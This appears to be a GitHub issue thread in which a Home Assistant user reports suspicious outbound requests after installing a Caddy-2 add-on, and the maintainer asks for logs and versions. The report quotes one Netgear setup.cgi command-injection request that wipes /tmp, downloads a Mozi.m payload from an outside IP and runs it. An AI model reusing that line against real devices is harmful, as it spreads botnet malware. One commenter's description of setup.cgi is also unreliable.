Malware infection?

[thegbert]

Been receiving multiple firewall blocked requests for pulls after installing add-on in Home Assistant, My firewall lists Home Assistant as trying to post GET requests to:

1. 37.0.11.157
2. "GET http:/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://180.121.234.86:46949/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1"

Messages stopped after stopping Caddy-2 add-on.

[einschmidt]

Hi @thegbert

Thanks for sharing your finding.

Please can you share:

• The repository you installed Caddy-2 from
• The current Caddy-2 version you are running

Happy to investigate, but need further information.

[thegbert]

Apologies for not including that earlier:

• Repository used: https://github.com/einschmidt/hassio-addons
• Current Version running: 1.1.0

Thanks!

[einschmidt]

I went through various build logs, but couldn't determine any failure or mismatch of container hash numbers yet.

Having that said, the add-on follows same build workflows as for example the hassio-addons, so I am wondering why other add-ons won't show the same behavior.

To help me continue my hunt, would you mind sharing your add-on logs after starting the add-on? Ideally also your Caddyfile?
Feel free to replace your personal information in both of them.

[thegbert]

Sure... add-on logs after starting here:

[s6-init] making user provided files available at /var/run/s6/etc...exited 0.
[s6-init] ensuring user provided files have correct perms...exited 0.
[fix-attrs.d] applying ownership & permissions fixes...
[fix-attrs.d] scripts: applying...
[fix-attrs.d] scripts: exited 0.
[fix-attrs.d] done.
[cont-init.d] executing container initialization scripts...
[cont-init.d] 00-banner.sh: executing...

Add-on: Caddy 2
Open source web and proxy server with automatic HTTPS

Add-on version: 1.1.0
You are running the latest version of this add-on.
System: Home Assistant OS 7.2 (amd64 / qemux86-64)
Home Assistant Core: 2022.2.2
Home Assistant Supervisor: 2022.01.1

Please, share the above information when looking for help
or support in, e.g., GitHub, forums or the Discord chat.

[cont-init.d] 00-banner.sh: exited 0.
[cont-init.d] 01-log-level.sh: executing...
Log level is set to INFO
[cont-init.d] 01-log-level.sh: exited 0.
[cont-init.d] done.
[services.d] starting services
[services.d] done.
INFO: Prepare Caddy...
INFO: Use built-in Caddy
v2.4.6 h1:HGkGICFGvyrodcqOOclHKfvJC0qTU7vny/7FhYp9hNw=
INFO: Prepare Caddyfile...
INFO: Caddyfile found at /share/caddy/Caddyfile
INFO: Run Caddy...
{"level":"info","ts":1644782896.9032063,"msg":"using provided configuration","config_file":"/share/caddy/Caddyfile","config_adapter":""}
{"level":"warn","ts":1644782896.9101617,"msg":"input is not formatted with 'caddy fmt'","adapter":"caddyfile","file":"/share/caddy/Caddyfile","line":2}
{"level":"info","ts":1644782896.914259,"logger":"admin","msg":"admin endpoint started","address":"tcp/localhost:2019","enforce_origin":false,"origins":["localhost:2019","[::1]:2019","127.0.0.1:2019"]}
{"level":"info","ts":1644782896.9163141,"logger":"http","msg":"server is listening only on the HTTPS port but has no TLS connection policies; adding one to enable TLS","server_name":"srv0","https_port":443}
{"level":"info","ts":1644782896.9180372,"logger":"http","msg":"enabling automatic HTTP->HTTPS redirects","server_name":"srv0"}
{"level":"info","ts":1644782896.9212222,"logger":"http","msg":"enabling automatic TLS certificate management","domains":["subdomain.qualifieddomain.net"]}
{"level":"info","ts":1644782896.922158,"logger":"tls.cache.maintenance","msg":"started background certificate maintenance","cache":"0xc00053dd50"}
{"level":"info","ts":1644782896.922956,"logger":"tls","msg":"cleaning storage unit","description":"FileStorage:/ssl/caddy"}
{"level":"info","ts":1644782896.9298792,"logger":"tls","msg":"finished cleaning storage units"}
{"level":"info","ts":1644782897.056298,"msg":"autosaved config (load with --resume flag)","file":"/data/caddy/autosave.json"}
{"level":"info","ts":1644782897.0567362,"msg":"serving initial configuration"}

Caddyfile attached below

clean_Caddyfile.txt

[einschmidt]

Hi @thegbert

Having a look at the provided information I can't determine any string config or notice any irregular log output.

Having that said, I am running out of ideas what and how to check next, so I have applied the label "Help wanted".

One last question. Please could you try another version and check if you receive the same output?

Otherwise I am uncertain how to help further :-(

[oscar230]

Has this been solved?

[einschmidt]

No, because reason is uncertain, and no further reporting happened.
Help is appreciated.

[oscar230]

No, because reason is uncertain, and no further reporting happened.
Help is appreciated.

Okay @einschmidt . Looks like caddy is trying to access setup.cgi which is a the "Common Gateway Interface", a internal address used to control Apache Web Servers.

I would say that the reporter (@thegbert ) should explain thier setup more. Just from the logs it is hard to tell. Maybe an traffic analysis like a Wireshark dump including the suspect package?